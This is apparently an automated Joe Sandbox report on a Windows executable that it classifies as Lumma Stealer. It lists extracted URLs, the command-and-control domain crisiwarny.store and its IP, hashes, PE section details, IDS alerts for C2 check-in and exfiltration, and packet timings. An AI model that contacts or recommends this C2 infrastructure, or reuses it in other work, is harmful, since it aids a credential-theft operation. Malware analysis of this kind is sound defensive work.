              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta | file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | file.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://crisiwarny.store/_y | file.exe, 00000000.00000002.2277498147.0000000000FD3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://crisiwarny.store/roxy-Authenticat | file.exe, 00000000.00000002.2277987160.000000000108B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269328476.000000000108B000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              https://ac.ecosia.org/autocomplete?q= | file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg | file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://crisiwarny.store/= | file.exe, 00000000.00000002.2277498147.0000000000FE4000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
              http://crl.micro | file.exe, 00000000.00000002.2277734685.0000000001008000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269401849.0000000001007000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg | file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://x1.c.lencr.org/0 | file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              http://x1.i.lencr.org/0 | file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmp | false
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://crisiwarny.store/apiFTfile.exe, 00000000.00000002.2277964213.000000000107D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        unknown
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2208235892.00000000057E0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&reffile.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://crisiwarny.store/ofile.exe, 00000000.00000002.2277498147.0000000000F9E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://crisiwarny.store/apilafile.exe, 00000000.00000003.2223528607.0000000001063000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://crisiwarny.store/apizfile.exe, 00000000.00000003.2223402187.00000000057A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://crisiwarny.store/pfile.exe, 00000000.00000002.2277498147.0000000000FD3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477file.exe, 00000000.00000003.2223528607.000000000105B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://crisiwarny.store/file.exe, 00000000.00000003.2238064199.0000000001085000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2209675961.00000000058C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2183214453.00000000057D6000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183022356.00000000057D9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183087466.00000000057D6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.95.91 | crisiwarny.store | United States | 13335 | CLOUDFLARENET US | true
                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1543431
                                                                    Start date and time:2024-10-27 21:05:11 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 5m 19s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:4
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:file.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@2/1
                                                                    EGA Information:Failed
                                                                    HCA Information:
                                                                    • Successful, ratio: 100%
                                                                    • Number of executed functions: 0
                                                                    • Number of non-executed functions: 1
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target file.exe, PID 5536 because there are no executed functions
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: file.exe
Time | Type | Description
16:06:16 | API Interceptor | 9x Sleep call for process: file.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
104.21.95.91 | file.exe | malicious | LummaC
 | file.exe | malicious | LummaC
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
 | file.exe | malicious | LummaC
 | file.exe | malicious | LummaC
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc
 | file.exe | malicious | LummaC
 | file.exe | malicious | LummaC
 | file.exe | malicious | LummaC
 | file.exe | malicious | LummaC
Match | Associated Sample Name / URL | Detection | Threat Name | Context
crisiwarny.store | file.exe | malicious | LummaC | 104.21.95.91
 | file.exe | malicious | LummaC | 104.21.95.91
 | wo4POc0NG1.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 172.67.170.64
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.95.91
 | file.exe | malicious | LummaC | 104.21.95.91
 | file.exe | malicious | LummaC | 104.21.95.91
 | MilkaCheats.exe | malicious | LummaC | 172.67.170.64
 | file.exe | malicious | LummaC | 172.67.170.64
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.95.91
 | file.exe | malicious | LummaC | 104.21.95.91
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | LummaC | 104.21.95.91
 | SecuriteInfo.com.Win64.Malware-gen.13500.20938.exe | malicious | Python Stealer, Exela Stealer | 162.159.135.232
 | PbfYaIvR5B.exe | malicious | DCRat, PureLog Stealer, zgRAT | 188.114.97.3
 | file.exe | malicious | LummaC | 104.21.95.91
 | SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exe | malicious | Unknown | 104.26.0.5
 | SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe | malicious | Blank Grabber | 104.20.23.46
 | SecuriteInfo.com.Win64.MalwareX-gen.31244.2279.exe | malicious | Unknown | 104.26.1.5
 | SecuriteInfo.com.Trojan.GenericKD.74444428.17336.1019.exe | malicious | Unknown | 104.26.1.5
 | SecuriteInfo.com.Trojan.Siggen29.54948.7115.19193.exe | malicious | Xmrig | 104.20.4.235
 | SecuriteInfo.com.Win64.CrypterX-gen.31361.18171.exe | malicious | Unknown | 104.26.0.5
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC | 104.21.95.91
 | file.exe | malicious | LummaC | 104.21.95.91
 | SecuriteInfo.com.Trojan.TR.Redcap.cdtxw.10783.3124.exe | malicious | LummaC | 104.21.95.91
 | wo4POc0NG1.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.95.91
 | K3SRs78CAv.exe | malicious | LummaC | 104.21.95.91
 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc | 104.21.95.91
 | file.exe | malicious | LummaC | 104.21.95.91
 | file.exe | malicious | LummaC | 104.21.95.91
 | SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe | malicious | LummaC | 104.21.95.91
 | MilkaCheats.exe | malicious | LummaC | 104.21.95.91
                                                                                        No context
                                                                                        No created / dropped files found
                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                        Entropy (8bit):6.51700997618475
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                        File name:file.exe
                                                                                        File size:3'029'504 bytes
                                                                                        MD5:05b1942e139d61a022f421bdd45a33bb
                                                                                        SHA1:94b79e3e26b7ee47e8931720db0503e01d1b6070
                                                                                        SHA256:f75e3f83ef5ddb3809cbef6aab8ba643f1570564aceafdd7a99dcdc11d7e89c7
                                                                                        SHA512:86d92dc1ca046548bcf764ea0047d57c0b40f871b353371ea1184341ecb6dbdc7e376092272d281cd8457a2f9dc17a721cff772d9785aeab0ca041f2ff2813b9
                                                                                        SSDEEP:49152:cgG53reLfCbwFxUmnFUr28X5bCzIMs5phQX8c0:c753reLfCbwFxZfgbCNsDqsc0
                                                                                        TLSH:C5E52AA2A64979CFD58E1B788527DF83995C03B5073048C3E96D6D7A7D63CC036BAC28
                                                                                        File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........P1...........@...........................1.....f.....@.................................T...h..
                                                                                        Icon Hash:00928e8e8686b000
                                                                                        Entrypoint:0x715000
                                                                                        Entrypoint Section:.taggant
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:6
                                                                                        OS Version Minor:0
                                                                                        File Version Major:6
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:6
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:2eabe9054cad5152567f0699947a2c5b
                                                                                        Instruction
                                                                                        jmp 00007FC71526A0BAh
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5a054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x5a1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x58000 | 0x27e00 | e1e8b0b94e12f56ea657ab75bf820f23 | False | 0.998114224137931 | data | 7.978933020723451 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x59000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x5a000 | 0x1000 | 0x200 | 555a11fa24a077379003c187d9c9d020 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fvanlhxn | 0x5b000 | 0x2b9000 | 0x2b8400 | 46774eda0e8b277a860e09796f4b96c5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
vsjzakbl | 0x314000 | 0x1000 | 0x400 | 0089f0b69f700e797419977289a332d4 | False | 0.787109375 | data | 6.140159833130769 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x315000 | 0x3000 | 0x2200 | 0fa32d3fc4ee3ba6f919309840477122 | False | 0.06721047794117647 | DOS executable (COM) | 0.6977774190705611 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-27T21:06:18.315174+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49704 | 104.21.95.91 | 443 | TCP
2024-10-27T21:06:18.315174+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49704 | 104.21.95.91 | 443 | TCP
2024-10-27T21:06:19.528364+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49705 | 104.21.95.91 | 443 | TCP
2024-10-27T21:06:19.528364+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49705 | 104.21.95.91 | 443 | TCP
2024-10-27T21:06:20.828100+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.5 | 49706 | 104.21.95.91 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                        Oct 27, 2024 21:06:18.317186117 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.317214966 CET49704443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.317222118 CET44349704104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.370908022 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.370979071 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.371063948 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.371367931 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.371387005 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.994996071 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.995243073 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.996536016 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.996548891 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.997309923 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:18.998564005 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.998564005 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:18.998646975 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.528449059 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.528587103 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.528701067 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.528728962 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.528783083 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.528783083 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.528836966 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.529002905 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.529078007 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.529088020 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.529109955 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.529139042 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.529791117 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.529839993 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.529848099 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.569525003 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.645382881 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.645643950 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.645719051 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.645750999 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.645972013 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.646032095 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.646121979 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.646142006 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.646156073 CET49705443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.646162033 CET44349705104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.786613941 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.786658049 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:19.786864042 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.787152052 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:19.787170887 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.409256935 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.409624100 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.411274910 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.411303043 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.411730051 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.413666010 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.417109013 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.417166948 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.828190088 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.828466892 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:20.828660965 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.828704119 CET49706443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:20.828725100 CET44349706104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.005625010 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.005664110 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.005877972 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.006140947 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.006155014 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.621306896 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.621403933 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.623167992 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.623184919 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.623682976 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.626493931 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.626902103 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.626945019 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:21.627011061 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:21.627019882 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:22.183753014 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:22.184034109 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:22.184251070 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.184251070 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.434727907 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.434777975 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:22.435102940 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.435245037 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.435266018 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:22.491538048 CET49707443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:22.491575003 CET44349707104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.055522919 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.055840015 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.057777882 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.057792902 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.057985067 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.060035944 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.060235977 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.060270071 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.060353994 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.060364962 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.757417917 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.757545948 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:23.757692099 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.758084059 CET49708443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:23.758105040 CET44349708104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.059568882 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.059623957 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.059727907 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.060103893 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.060120106 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.677720070 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.677840948 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.693770885 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.693811893 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.694091082 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:24.695483923 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.695596933 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:24.695611000 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:25.230750084 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:25.231053114 CET44349710104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:25.231287003 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:25.231287003 CET49710443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:25.745433092 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:25.745501995 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:25.745592117 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:25.746114969 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:25.746128082 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.533592939 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.533687115 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.534854889 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.534874916 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.535079956 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.536290884 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537167072 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537199020 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.537293911 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537321091 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.537432909 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537465096 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.537595987 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537621021 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.537786961 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.537818909 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.537997961 CET49716443192.168.2.5104.21.95.91
                                                                                        Oct 27, 2024 21:06:26.538027048 CET44349716104.21.95.91192.168.2.5
                                                                                        Oct 27, 2024 21:06:26.538041115 CET49716443192.168.2.5104.21.95.91
